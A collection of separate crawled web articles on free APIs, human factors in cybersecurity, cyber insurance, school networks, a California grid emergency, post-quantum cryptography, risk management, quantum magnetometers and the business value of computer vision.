File conversion APIs convert data between different formats, such as HTML, image files, and Office files. Other data formats you can convert include XML to JSON and CSV to JSON. You can also use file conversion APIs to merge multiple Office files into one document. Furthermore, you can use email validation APIs, barcode scanning APIs, OCR APIs, and natural language processing APIs for file conversions too.
Other Free APIs
In addition to those mentioned above, there is a plethora of other APIs that you can use to build applications. Some of the best free public APIs include:
· SYSTRAN Platform, which allows you to utilize and analyze both structured and unstructured content, such as social media and web content, in multiple languages.
· Open Weather Map, which enables you to receive weather data from any location on the planet.
· Investors Exchange Trading, which returns a wide range of effective spread, eligible volume, and price improvement of any stock, by each individual market. | <urn:uuid:1a6f5638-a9ba-4d88-b2d3-63f07ff5f63e> | CC-MAIN-2022-40 | https://kalilinuxtutorials.com/free-apis-to-build-applications/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00518.warc.gz | en | 0.910932 | 710 | 2.609375 | 3 |
I wrote previously about how people are the likely the most dangerous element of the cybersecurity ecosystem – how we, and our various limitations, often undermine cybersecurity policies, procedures, and technologies. I discussed how it is not just rogue actors who cause problems, but, rather, how human mistakes, whether oversharing information on social media, falling prey to social engineering attacks, or misconfiguring technology – are often the source of cyber-catastrophes.
Another area of human psychology that is important to recognize when it comes to information security, but which is often overlooked, is the impact of marketing, language, and biology.
Consider, for a moment, “smartphones.” “Smartphone” is, of course, a term that we all use – but it is, in reality, a misnomer that leads to security vulnerabilities.
The name “smartphones” emerged because these devices were originally marketed a decade ago by wireless phone companies that sold them as replacements for our then, non-smart phones. When we bought smartphones, we typically retained our “calling plans” and “texting allowances” – both of which were contract terms that we associated with mobile phones. At the time that smartphones emerged, it would have been far more difficult for providers to convince us to abandon our older phones for “pocket computers that have a phone app” than to upgrade from a regular phone to a “smart phone.” And, so, despite voice calling being a tiny portion of smartphones’ capabilities and typical usage, the term “smartphone” was born and became a staple of language.
The perception of smartphones as phones, rather than as full blown computers, however, has led to people who would never run a computer without anti-virus software to do exactly that on their phones. Many people who would never allow someone else to access their computer files, or who have strong passwords to their laptops at work and at home, don’t bother password protecting their phones. Folks carried to their smartphones the practices that they previously used for their older phones; they did not apply those which they had long been using to protect their computers.
It is likely that our inability to easily perceive how the replacement for an item is something totally different than its predecessor, rather than the next version of it, results from our biology; we are programmed to expect the child of a cat to be a cat, of a dog to be a dog, etc.; it takes many human lifetimes for evolution to transform one species into another. In the technological world, however, change can happen rapidly – the replacement for a phone may be a computer that looks like a phone. To improve information security, we must better recognize the risks that such transformations bring.
This post was sponsored by Microsoft Office, which which recently aired a Modern Workplace webcast entitled Cyber Security: The Human Element. To watch a replay please click here. | <urn:uuid:34c5cf64-8794-47eb-9dc2-b0a7d3f58432> | CC-MAIN-2022-40 | https://josephsteinberg.com/cybersecurity-risks-created-human-biology/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00718.warc.gz | en | 0.972425 | 607 | 2.890625 | 3 |
COVID-19 could boost need for cyber insurance
As the world grapples with the COVID-19 epidemic, cybercriminals are already taking advantage of the panic. Social engineering tactics are being used to target fear and disinformation, for example with spam emails about the virus that contain malware links.
Social media is a lucrative channel for cybercriminals and social media-enabled attacks generate $3.25 billion annually according to a study at the University of Surrey. Online fraud and shopping scams are also popular, with Australia's Cyber Security Centre receiving a report every ten minutes. According to the Reserve Bank of Australia, $574 million of online retail spent in 2018 was fraudulent, with CNP - "card not present" - being the most prevalent type of fraud.
Internet users with lower computer literacy, who are less aware of cyber-crime and more likely to fall for traps and scams - are also least likely to know how to protect themselves. Seniors over 60, who didn't grow up with computers and social media, are the preferred victims of cybercrime against individuals. As a group they lost $649 million to cybercriminals in 2018 according to FBI data.
Even for more experienced users, protection is challenging. There's a bewildering amount of solutions out there. Which one is right for them? What about mobile devices? Should they protect their computer, or the home WiFi network, or both? How much should it cost? Who can be trusted for advice?
The reality is that most individuals don't have adequate protection or knowledge of how to get protection. And even for those that do, there are frequent data breaches beyond their control where their personal information is compromised. While governments around the world are tightening regulations around data, breaches still take place with alarming regularity.
In 2019 alone several billion records were compromised across organisations ranging from major social media platforms (Facebook: 540 million user details exposed) to banks (First American Financial Corp: 885 million transactions and customer records exposed). Even if someone has taken all the right steps, they can still become a victim.
This is why cyber insurance is becoming an increasingly important tool in the cyber defence arsenal. In the same way that no amount of locks and alarms can save a home from every burglary, businesses and individuals need to consider insuring themselves against digital theft.
Cyber-crime insurance also extends to damages beyond the internet. Lost and stolen credit cards, ID cards and passports also result in significant loss to individuals. Identity theft is a fast-growing crime: in 2017 nearly 60 million people were affected by identity theft in the US alone, with the yearly total cost of identity theft at $16 billion. Another $24 billion was lost to credit card fraud. It's not only adults who are affected: child identity theft cost families over $540 million in losses in 2017.
The challenge is that most consumers and businesses don't understand the concept or need for cyber insurance any more than they understand cyber-crime. As Daniel Carr, chief innovation officer and cyber lead at Occam Underwriting, noted at a recent forum, people "understand the harm of the cyber environment but they don't quite know who to blame yet, and that's systemic across every area of society, be that the judicial society, the regulatory environment or the commercial environment."
Service providers can play a key role here. Most telcos are well known and trusted brands that have an established relationship, often of several years duration, with users. In an increasingly competitive telco market, customer experience and offering added value is vital. Security products, including cybersecurity solutions and insurance, are a natural fit in the array of offerings from service providers. Cyber insurance aligns very well with telcos' Internet of Things propositions and their family propositions to have a personal cyber product.
The Internet of Things trend is only going to increase the number of vulnerabilities in homes and offices. Internet-connected smart devices increasingly contain personal data, such as account log-in details to third party services and payment information. Home surveillance systems are being hacked, and as other appliances get connected, they will create further exposure. | <urn:uuid:ae617466-ac69-43e2-955c-3ca8da4297d2> | CC-MAIN-2022-40 | https://itbrief.asia/story/covid-19-could-boost-need-for-cyber-insurance | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00718.warc.gz | en | 0.958256 | 832 | 2.953125 | 3 |
Schools across Southeast Asia have been forced to close during the pandemic lockdowns. In many cities, students have shifted to home-based learning with the aid of video conferencing technology. In Singapore, for example, new coronavirus clusters have emerged in schools recently, forcing these institutions to adopt a partial or full-closure and transition to online learning.
By now, many schools have adapted and are able to transition to remote or hybrid learning – where some students learn from home while others stay in school – at a moment’s notice, when there is a surge in cases or when the authorities announce city lockdown. The key, as school administrators are struggling with, is to transition seamlessly.
Furthermore, educators realise that the future of learning is now inextricably linked to digital tools and online environments, even beyond the pandemic. Today’s students are more technologically savvy than ever, and digital devices make more frequent appearances in their lives both within and outside the classroom.
Governments across the region are also pushing for greater transformation in the education sector, which means that our institutions must align themselves accordingly to achieve this vision. However, simply blindly conforming to digital transformation may do more harm than good if schools are not smart with how they integrate their technologies.
Why must schools adopt a smart network?
Let’s first discuss the most immediate challenge facing schools right now — having to transition to home-based learning, often with very little notice. This is where a resilient network infrastructure is paramount in ensuring continuity of learning.
An intelligent campus network can respond nimbly to sudden changes in circumstances where network usage is expected to increase, such as during the shift to online learning. A smart network can efficiently manage these types of traffic spikes without the need for IT teams to manually configure anything, reducing network overload.
Additionally, with the integration of automated features, an intelligent network can effectively analyse, predict, and eliminate network downtime to prevent disruptions in the learning experience, which can be crippling in a fully remote environment.
The enabling of seamless collaboration and communication in a digital learning environment is another benefit of the intelligent campus network. It helps to provide students with the same access and tools to education at home as are available on campus. Students and teachers can effortlessly communicate in real-time with one another online via a communications platform that is supported by a smart network. Video conferencing, instant file transfers, and screen sharing can be accomplished without breaking a sweat to further preserve the learning experience.
Buckling down for the long run
The education sector, as a whole, is becoming cognizant of the long-term value of digitalisation and technology adoption. Singapore, for instance, has introduced an EdTech Plan. A country-wide plan that spans 2020 to 2030 designed to guide the development of the technological ecosystem and key platforms for learning across learning institutions from primary schools to pre-universities. The plan seeks to empower schools to leverage educational technology to help make education more connected, personalised, self-directed, and human-centric.
However, as schools begin to revamp existing curriculums and accommodate the use of technology and tap into the potential of digital transformation, they must also be conscious of the security risks involved.
In a world that is becoming increasingly connected, increased connectivity can drastically widen the cyberattack surface and add to the threat vectors cybercriminals can exploit. This is especially true in remote learning, where students connect to the school network, often using their personal devices and home networks. According to a recent 2020 Global Threat Intelligence Report by NTT, 29% of cyberattacks in Singapore were targeted at the education sector throughout 2019, making it the second most targeted sector globally after the government.
As such, schools must first address how they can build a secure foundation on which to lay out their digital transformation initiatives. This is where an intelligent network can play a crucial role. With strengthened encryption and enhanced security measures, an intelligent network can provide a common security strategy for all network access, minimising the risks of malicious cyberattacks.
The fortified security of a smart network can help protect schools’ critical data assets and the privacy of its students and staff while preserving the reputation of academic institutions.
A smart network also contributes significantly to improving the robustness of existing network infrastructure and offering higher bandwidth and connectivity to meet the requirements of new-age technology such as AI and IoT. Such emerging technologies provide a multitude of benefits, ranging from optimising the learning process to allowing easier access to educational materials.
Furthermore, a fully integrated smart network allows school IT teams to adopt a truly unified approach that allows all technology and communications systems to work together as a single, reliable network — even as more technology is added to the mix.
Educational institutions that have implemented a smart network are starting to see such systems bear fruit. The Singapore University of Technology and Design (SUTD) pivoted to an intelligent campus network to create an intelligent campus with education solutions that empower personalised learning with secure, reliable communications and collaboration. SUTD is now able to reduce costs, eliminate downtime, and optimise network efficiency to obtain its key goals of providing quality, secure, and individualised education for its students.
At its core, an intelligent network is a crucial first step for educational institutions, serving as the bedrock that supports futureproof teaching and research initiatives. It lays the foundation for creating an ideal academic environment for students, teachers, and faculty members — inculcating a responsive system that enables learning anywhere, anytime.
By Dirk Dumortier, Head of Business Development Smart-City, Healthcare, Education, Asia Pacific, Alcatel-Lucent Enterprise | <urn:uuid:fb90bd90-f652-48cc-a356-8d65ca487ea0> | CC-MAIN-2022-40 | https://disruptive.asia/are-school-networks-in-se-asia-smart-enough-to-empower-future-learning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00718.warc.gz | en | 0.947405 | 1,152 | 2.75 | 3 |
California officials have declared a statewide grid emergency amid a lengthening heat wave and fears of power shortages.
Grid operator Caiso (California Independent System Operator) forecasts potential electricity shortages of three gigawatts from September 4 through to September 6, every evening.
Temperatures in Northern California are expected to be 10-20 degrees Fahrenheit warmer than normal through Tuesday, September 6. In Southern California, temperatures are expected to be 10-18 degrees warmer than normal.
Caiso has called on Californians to take voluntary conservation steps, such as setting thermostats to 78 degrees or higher, avoiding the use of major appliances and turning off unnecessary lights.
Electric car users should also avoid charging their vehicles during the Flex Alert period.
“It’s pretty clear Mother Nature has outrun us,” Governor Gavin Newsom said during a news conference. “The reality is we’re living in an age of extremes - extreme heat, extreme drought.”
The worst drought in 1,200 years has impacted the state's hydroelectric dams, which power 10 percent of California's needs.
The emergency order temporarily relaxes environmental regulations on gas-burning power plants, and allows companies to use backup generators more freely. Ships can also use their own generators while docked at ports.
More in Critical Power
Conference Session Roundtable: The latest in power innovation | <urn:uuid:054eeeec-3ae2-47a1-82c4-57c9859936f3> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/news/california-declares-statewide-grid-emergency-warns-of-blackouts/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00718.warc.gz | en | 0.917312 | 288 | 2.640625 | 3 |
Since Peter Shor published his eponymous algorithm for factoring composite numbers in 1994, cryptographic experts have speculated over whether and when the quantum computer needed to execute his algorithm on numbers of the size used in present-day public-key cryptosystems would become a reality. If and when it happens, the implications for much of the information security business will be profound. Expert opinions cover the full range, from: “It’ll never happen” to: “You-know-who already has one”. An unscientific survey places the median estimate in the late 2020s. So, we would appear to have ten years to monitor and react. Now, we are in a race: developing and evaluating new cryptographic algorithms takes deep expertise over an extended period of time. And substituting new algorithms for the ones that have become deeply embedded in information systems over the last thirty years takes an almost inexplicable amount of time. And don’t forget that, by recording key-exchange messages, a future quantum computer will be able to decipher plain text that existed any time in the then-past.
Harder to assess is the amount of time it will take to overcome the substantial engineering challenges remaining before a large-scale quantum computer can be put to work on the problem. Earlier this year, a team from the University of Sussex announced the first blueprint for a large-scale quantum computer, inviting other researchers to collaborate on the remaining practical problems. Without further advances, their machine would occupy the area of a football field and consume megawatts of power. So, we should not expect such machines to be commonplace in the near future. But, given time, further advances are inevitable.
As Yogi Berra astutely reminded us: “It’s tough to make predictions …” But, what is a prudent course of action today? At the very least, we need to follow developments and understand how we must react as researchers get closer to their goal.
Entrust Datacard researchers explore the state of the science and its implications for public-key cryptography in this new white-paper: https://www.entrust.com/resources/certificate-solutions/learn/post-quantum-cryptography | <urn:uuid:547691a3-e930-4341-a23f-4c76c1f929fe> | CC-MAIN-2022-40 | https://www.entrust.com/es/blog/2017/05/its-tough-to-make-predictions/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00718.warc.gz | en | 0.943402 | 458 | 3.125 | 3 |
Nowadays, more than before, each company needs an internal & daily Cyber Security assessment. To do that they need to provide an huge investment and this is a new concern due to the continuous evolution of Cyber Attacks. Risks faces all project aspects: budget, planning, goals, quality levels, and more. In fact, one of the most problematic elements of cyber security is the quick and constant evolution nature of security risks & attacks. Within this environment, the traditional approach is not the solution! Companies needs a Risk Management Platform that could helps to plan, implement, improve and continuously measure their security controls. A Risk Management Platform helps to increases the likelihood of positive events.
Risk Management Definition
The RISK MANAGEMENT is the ensemble of algorithms & processes, that use a stable scientific approach, for the identification, analysis, assessment, control, and avoidance, minimization and/or elimination of unacceptable digital-related risk across the entire organization. It enables the Chief Risk Manager (CRM) to have under control his network 24/7 using an aggregative data indicators of security risk.
Some RISK MANAGEMENT platform can provides you with recommendations on specific operational defensive actions while helping determine which resources should be allocated to match risk tolerance and business strategy.
As is the definition, Cyber Security is the ensemble of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access. Cyber security involves protecting information and systems from major cyber threats, such as cyber terrorism, cyber warfare, and cyber espionage. In their most disruptive form, cyber threats take aim at secret, political, military, or infrastructural assets of a nation, or its people. Therefore it is a critical part of any governments’ and enterprises security strategy. Consequently, the hardware physical security is strongly related!
Ensuring cybersecurity requires coordinated efforts throughout an information system. Elements of cybersecurity include:
- Network security
- Application security
- Endpoint security
- Data security
- Identity management
- Database and infrastructure security
- Cloud security
- Mobile security
- Disaster recovery/business continuity planning
- End-user education
Cyber Security Assessment & Risk Management
A secure network architecture should follow a defense-in-depth philosophy and be designed with multiple layers of preventive controls. While preventive controls are ideal, detective controls are a must. There is no way to prevent any attack and sometimes preventive controls fail! Detecting intrusions into a network is not accomplished by deploying a single piece of technology.
To be confident about your network, you need to start with a Security Assessment, fix any revealed risk and continuously monitor it to reveal any further one (Risk Management)
Establishing a well-defined breach and attack simulations exercise program allows organizations the ability to identify malicious or anomalous traffic on the network and determine how the analyst should respond to this kind of traffic. When performing this kind of test, it is important to create traffic which mimics current attack methods.
At arimas we are proud to have different solutions to help companies in their Security Assessment as well as increase their defence to cyber attacks. | <urn:uuid:c0abdc03-638e-4159-bb2b-379aedfc9f2d> | CC-MAIN-2022-40 | https://arimas.com/2020/07/13/risk-management-platform-provides-recommendations-on-specific-issue/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00118.warc.gz | en | 0.924506 | 641 | 2.8125 | 3 |
If a quantum technology cannot make our human lives healthier, wealthier, and more enjoyable, then what’s its value? These human-realm, quantum technology use cases: Brains, Civilization, and GPS-Free Travel, probe magnetic fields with greater sensitivities and ease-of-use than before.
The range of the magnetic B-field that we are probing today is 1pT — 1fT. See Fig. 1. The Earth’s magnetic field amplitude (10-4 T) is ~1000 times larger than environmental noise (10-7—10-9 T), and ~100 million times larger than the magnetic fields generated at the scalp by neural currents in magneto-encephalography (MEG)
Figure 1. From High Sensitivity Magnetic Field Sensor Technology slide 11, of David Pappas (NIST)’s tutorial at the APS 2008 March Meeting of the American Physical Society meeting.
Bennett et al’s, 2021 Review: Precision Magnetometers for Aerospace Applications in the annotated Fig. 2 shows our area-of-interest. In the red rectangle, we see that sensors are moving to: smaller sizes, more precise resolution, and smaller power requirements. Of particular interest for our use cases, are these four:
- NV = nitrogen vacancy in diamond (see IQT: Quantum Diamond Deficits and Assets);
- AVC = atomic vapor cell: A glass cell holding a 400K vapor of alkali atoms, upon laser illumination, will align its spins. If a magnetic field is present, a polarization or amplitude change in the retransmitted light appears (section 3.1 in Bennett et al’s, 2021);
- SERF = Spin Exchange Relaxation-Free: like AVC, but denser vapor at a higher temperature, which results in a higher sensitivity (section 3.1 in Bennett et al’s, 2021 Review); and
SQUID = superconducting quantum interference devices; robust mid-1960s technology
Figure 2. OM= optomechanical, NV = NV centers in diamond, Atomic Vapor Cell + SERF = trapped atom quantum technology, SQUID – SQUID (Superconducting Quantum Interference Device), from Bennett et al’s, 2021 Review: Precision Magnetometers for Aerospace Applications
Regarding OM = Optomechanical: This is a rich topic to be written separately in the future. If you are OM-curious, see section 3.2 in Bennett et al’s, 2021 Review, further details in Li et al., 2021 Cavity Optomechanical Sensing.
Magneto-encephalography (MEG) is a non-invasive, neurophysiological technique that measures the magnetic fields generated by neuronal activity of the brain. MEG is direct, with higher temporal resolution: ~ms, and higher spatial resolution: ~mm, than indirect measurements, such as fMRI, PET and SPECT.
The gold standard for MEGs is currently SQUID, but that standard began to shift in 2018 to atomic vapor cell quantum (AVC) technology; in particular, to optically-pumped magnetometers (OPMs), with Boto et al, 2018’s new MEG system. While SQUID sensors have femtotesla (fT) sensitivity, the SQUID sensors have some negatives: 1) cryogenic cooling requirements, 2) rigid, patient-head-movement inside of a ~500 kg unit, 3) inflexibility to varying head sizes. For pediatric patients, MEGs by SQUID sensors are especially unsuitable.
Boto et al, 2018’s MEG-OPM prototype system addressed these negatives with a ~1kg custom helmet, where 13 OPM sensors were mounted. Each sensor was a 3x3x3 mm3, 87Rb-vapor-filled and heated component at ~150C, with helmet body temperature. The helmet was a 3D-printed ‘scanner-cast’, designed for the patient’s head, using an anatomical MRI scan. The magnetic field was indicated by a photodiode-detectable drop in light transmission, after a 795 nm, circularly polarized laser beam, spin-polarized the cell’s Rb atoms.
Feys et al, May 2022 work: On-Scalp Optically Pumped Magnetometers versus Cryogenic Magnetoencephalography for Diagnostic Evaluation of Epilepsy in School-aged Children improves upon the above with 32 sensors, tested with pediatric patients, who have idiopathic or refractory focal epilepsy. The research goal was to detect interictal epileptic discharges (IEDs) and compare the MEG-OPM data with MEG-SQUID data. Feys et al, 2022’s work demonstrated that MEG-OPM provided similar sensitivity: 1-3pT/Hz1/2, but higher IED amplitude and higher signal-to-noise than conventional MEG-SQUIDs. Figure 3 indicates the experimental set up.
Figure 3 Experimental Setup for MEG IED measurement of OPM versus SQUID (4th figure) from Feys et al, 2022.
The MEG research field is active with new approaches implementing flexible OPM and SERF designs. A glimpse of what is ahead can be seen in the use cases of the Abstract book of the Today’s Noise Tomorrow’s Signal 2019 workshop.
The gold standard for archeological magnetic field mapping is also SQUID technology. A high-profile example, which discovered the historical extent of the capital: Karakorum of the Mongol Era, was published by Bemmann et al, 2021, last November, with a lead in Nature. The journal displayed an exotic-looking field photo, which included a wagon carrying a set of cryonically cooled SQUIDs that was pulled by an off-road vehicle. Why would Nature highlight a science result based on SQUID, which is mid-1960s technology? Intrigue won the day.
I suggest to archeological magnetic mappers to consider the benefits of the geophysics approach to use drones. With a keyword search: UAV magnetic field mapping, you will discover drone-mounted, magnetometers, based on atomic vapor cells that approximate the magnetic field flux sensitivity of SQUID sensors: on the order of several pT/Hz1/2. In addition, new operational modes for atomic vapor cells, such as light-shift-dispersed Mz, have been developed, that would further increase the magnetometer’s sensitivity.
Consider these advantages:
1) More efficient data collection and processing, 2) lower field cost, 3) access to inaccessible or high risk regions, 4) greater worker safety, 5) UAV integration with other geophysical sensors, and 6) no need for cryostats. A disadvantage compared to SQUID is the scalar, instead of vector, magnetic flux measurement. However, GPS inertial sensors and a high sampling rate can provide mapping capabilities. This 21-minute video from Geometrics, from which I grabbed a frame for Fig. 4, demonstrates such a system in the field.
Figure 4 A frame-grab from a Geometrics video, which demonstrates UAV magnetic-field mapping
Where is Dark Ice? We begin this section with a mystery. Lockheed Martin put significant resources into developing the NV in diamond magnetometer prototype, with a team (led by M.J. DiMario), an Element-6 partnership for diamond manufacture, 21 patents, Dark Ice tests and future plans, public press (which led to hundreds of international press pieces), Dark Ice trademark and a logo applications, a research preprint (Edmonds et al, 2020) and publication (Edmonds, et al, 2021).
Yet Lockheed Martin never followed up its logo application request, and the company never provided a trademark “statement of use” (SOU) to the USPTO. Therefore the logo and trademark were dropped (many thanks to D. Barnes to understand the legalities). The Dark Ice team leader left Lockheed Martin in 2020, to form his own company. Of the public research results, in Figure 1 of the preprint, the instrument is only called ‘Device’, and in the corresponding 2021 journal article, the photo of Dark Ice’s hardware is deleted altogether. Dark Ice appears to have gone ‘Dark’.
Figure 5 Lockheed Martin’s 2019 press release photo of the Dark Ice device
The prototype used a synthetic nitrogen-doped diamond to measure the magnetic field variations: strength and direction. When overlaid with maps of Earth’s magnetic field, supplied by the National Oceanic and Atmospheric Association, the prototype produced Earth location information. This technology would potentially support situations when GPS was not available or in otherwise challenging conditions. According to the Dark Ice team’s preprint and published papers, the diamond’s chemical vapor deposition (CVD) manufacturing process was successful to probe irradiation and annealing procedures to support the manufacture of quantum-tech quality NV diamonds.
Today, the development focus in the NV in diamond research field is to improve the manufacture of such diamonds and to improve readout fidelity technologies.
As described in the comprehensive Achard et al, 2020 Review: CVD diamond single crystals with NV centres, the main advantages of CVD for making quantum-grade diamonds is the ability to engineer stacked layers of different doping and composition in a dynamic and very flexible way that can scale. The Review presents the best processes dependent on application, including for magnetometry. The ∼10-15 ppm, quantum-tech regime, implemented by the Dark Ice team, requires adapted growth conditions that allow for high doping efficiency, while preserving the crystalline quality. The Edmonds et al, 2021 results further identified the limiting sensitivity factors for a magnetometer. Himadri Chatterjee’s 2021 PhD thesis used an Element-6/Dark Ice-process diamond with other diamond samples and demonstrated magnetic field detection sensitivities into the ~100 nT/Hz1/2 regime, using IR absorption magnetometry. He provided a list of improvements for the system’s sensitivity to reach the tens of pT/Hz1/2 sensitivity of other researchers. His thesis and the Achard et al Review are good sources to find descriptions of the community’s research efforts.
While Dark Ice’s disappearance might be concerning news about the technical viability of such magnetometers, don’t worry. This note should reassure you that NV in diamond magnetometer progress marches on.
Amara Graps, Ph.D. is an interdisciplinary physicist, planetary scientist, science communicator and educator and expert on all quantum technologies. | <urn:uuid:682d3779-cc25-4bb2-97de-fdd4868b1a18> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-magnetometers-navigating-human-realms/amp/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00118.warc.gz | en | 0.877498 | 2,239 | 2.8125 | 3 |
As business leaders investigate the transformative Return on Investment or ROI of computer vision, they are finding evidence that this technology can improve virtually every industry it touches. This explains the rapid growth of the computer vision market, which held an estimated value of $15.9 billion in 2021 and is expected to reach $51.3 billion by 2026.
It may explain why nearly all respondents in a recent IDG/Insight survey believe that computer vision will boost revenue while saving time and money—and this could also be why 37% of those respondents plan to implement the technology to improve their operations in the near future.
Whether the ROI goals of an organization relate to defect detection, operational efficiency, preventative maintenance, cost reduction, customer satisfaction, security, better healthcare outcomes, or safety—this white paper shows how computer vision is empowering firms across all industries to achieve never-before-possible outcomes.
This section describes what computer vision is, the basics of how it works, and the general benefits that enterprises receive when leveraging the technology.
In the simplest of terms, computer vision is a technology that allows computers to analyze, interpret, and understand visual information in order to automate tasks and make decisions that normally require humans. As IBM puts it, “If AI enables computers to think, computer vision enables them to see, observe, and understand.”
Of course, computers do not technically “see” the way humans do. Instead, they derive statistical inferences (or conclusions) from numerical values—values that represent the colors of pixels in a digital image.
Just like every person learns to see and understand the world, computer vision algorithms need to receive training to interpret and understand the visual information they capture. Computer vision platforms use deep learning technology to “train” algorithms capable of deriving inferences from visual data and making nuanced decisions based on those inferences.
The computer vision training process involves downloading thousands (or millions) of labeled or annotated images. For example, training images for a defect detection system would include annotations to indicate the presence/non-presence of defects and the types of defects involved. After receiving enough examples, the AI algorithm learns to identify these defects in real-time.
With the right training, an AI algorithm can perform a wide range of tasks that would have required visual monitoring, analysis, interpretation—even expert-level decision-making.
The best computer vision solutions function as full-lifecycle platforms that facilitate the fast and rapid training of new AI algorithms. A full-lifecycle computer vision platform includes tools to automate the process of annotating and tagging training images. Advanced platforms also feature tools to instantly generate synthetic training images, to increase the size of the datasets. This speeds up the process of developing computer vision models for unique and entirely novel scenarios.
Computer vision platforms may now feature no-code interfaces so non-tech savvy users can train sophisticated algorithms without knowing how to code.
A computer vision platform integrates with a network of high-definition cameras strategically positioned to capture visual information. This could be an existing network of cameras or a new one to suit the demands of the use case. Computer vision algorithms can even receive and interpret live video and images from mobile cameras, such as flying drones and walking robot dogs.
As for hosting, computer vision platforms can run in the cloud or on locally installed edge servers. Edge servers offer an increased level of security by hosting the data locally to the device. Developers can configure an edge-based computer vision system to integrate with existing IoT infrastructures and on-premises configurations.
The practical use cases for computer vision are endless, including systems for:
Ultimately, computer vision eliminates the errors, inefficiencies, and negative outcomes that inevitably happen when workers suffer from boredom or distractions in monotonous visual jobs. These negative outcomes include increased absenteeism, high turnover, errors, injuries, and counterproductive work behavior. (4) Computer vision also saves time and money through its capacity for 24/7 uptime and exponentially faster and more accurate visual task completion.
By freeing up employees to focus on more business-critical tasks, computer vision alleviates labor burdens—even when it comes to high-skilled analyst jobs. This brings the added benefit of decreasing the need for workers to be physically present during pandemic conditions.
Here is an overview of some of the most compelling ROIs of computer vision:
This section examines the return on investment for computer vision technology in specific industries. Since computer vision is a horizontal solution that services a wide variety of needs, there is significant overlap across the industries below, so it is worthwhile to read all of the sections.
Manufacturers are using computer vision to realize high ROIs in:
Manufacturing defects result in numerous costs related to the notification of customers/retailers, tracking down defective products, shipping costs, replacement costs, in addition to reputational damage, and product liability lawsuits. Human-led quality assurance activities are vital to preventing these costs, but the work is intensive, monotonous, expensive, and highly prone to errors. In other words, serious and potentially dangerous defects frequently go unnoticed due to unavoidable human error.
In contrast, computer vision automates real-time defect detection tasks to achieve orders of magnitude greater consistency, accuracy, and speed—at a cost that is exponentially more affordable than human labor alone. Computer vision can instantly detect scratches, cracks, dust, painting errors, dents, packaging errors, labeling errors, misplaced bottle caps, sanitary issues, and other defects that it is trained to identify.
Digital twins are virtual replicas of physical products and manufacturing processes—three-dimensionally digitized into the metaverse to help engineers understand, forecast, design, test, and optimize performance in real-time.
Computer vision assists in the creation of digital twins by using HD cameras and other sensors to capture the data required for rapid digital twin modeling and creation. Computer vision also allows digital twins to reflect real-time metrics, insights, and visuals on manufacturing activities as they happen.
Digital twin strategies with computer vision offer:
Manufacturers leveraging digital twin technology can achieve the following ROIs:
The severe injuries that arise from PPE non-compliance have been studied closely in the several industries. The statistics from NYU’s protective equipment standard illuminate the clear relationship between serious injuries and failure to use PPE. For example, only 1% of face injuries happen to people with facial protection. And, only 16% of workers who suffered head injuries were using hard hats (dispite 40% were required to wear them at the time of injury).
Strict enforcement of PPE rules is one of the most important ways to prevent these severe manufacturing injuries. Nevertheless, it is impossible for human managers to monitor PPE use for all workers across every inch of a facility at all times.
This is where computer vision can help. These systems automate PPE compliance monitoring for gloves, goggles, face shields, aprons, harnesses, hardhats, and more. They can identify all workers without PPE as soon as the compliance failure happens—sending real-time alerts to shift managers.
By boosting PPE compliance through improved monitoring, computer vision offers the high ROI of significantly reducing the number and severity of serious workplace accidents and injuries.
The above ROIs are only a few ways computer vision benefits manufacturing. Here is a summary of the most important computer vision ROIs for manufacturing, including some that have not been mentioned yet:
In addition to some of the ROIs referenced above, energy firms are using computer vision to optimize the following:
Successful monitoring of key infrastructure for predictive maintenance purposes is a high priority for large-scale energy operations. Unfortunately, human inspectors are prone to mistakes, misjudgments, and errors. It is also costly and dangerous to transport inspectors to remote locations, resulting in infrequent inspections.
In contrast, computer vision uses a network of cameras and sensors to inspect infrastructure components 24 hours a day—whether they are close by or in remote locations. Computer vision solutions can also deploy airborne inspection drones to monitor pipeline assets across large distances. With greater accuracy and cost-efficiency than human inspectors, these systems detect problems long before dangerous or costly incidents occur.
Deploying computer vision security solutions at remote oil and gas sites increases overall site security. The increased 24/7 monitoring that computer vision provides is also valuable at manned sites, especially after hours when workers are not present—or when it is challenging for security personnel to provide sufficient coverage.
Computer vision models for oil and gas site security achieve the following:
Oil and gas firms need to comply with strict rules from the Environmental Protection Agency (EPA); Environmental, Social, Governance (ESG); Socially Responsible Investing (SRI); and other organizations.
Nevertheless, unintentional violations of these environmental rules are common. In many cases, this is due to the difficulty in monitoring oil and gas sites in remote areas frequently. For example, the accidental discharge of untreated water into a waterway could continue for weeks or months before a human inspector arrives and takes notice.
By automating environmental law compliance monitoring at remote sites, computer vision offers 24/7 real-time alerts when the compliance issue appears. This empowers firms to fix environmental concerns before they result in costly damages, lawsuits, fines, and reputation damage.
The above ROIs are an example of the ways computer vision benefits the oil and gas industry. Below is a summary of the most important ROIs for oil and gas:
Similar to the industries above, computer vision offers clear ROIs for healthcare in the following areas:
Patient misidentification errors cost hospitals approximately $17.4 million in losses per year in denied insurance claims related to fatal and harmful injuries. Computer vision can dramatically reduce these errors—and reduce their damaging and costly consequences—by using real-time face identification to authenticate the identities of patients during every interaction with medical staff.
Computer vision platforms, such as Chooch, can also achieve HIPAA compliance and all seven levels of PACS integration to meet the strictest healthcare industry data privacy and data security requirements.
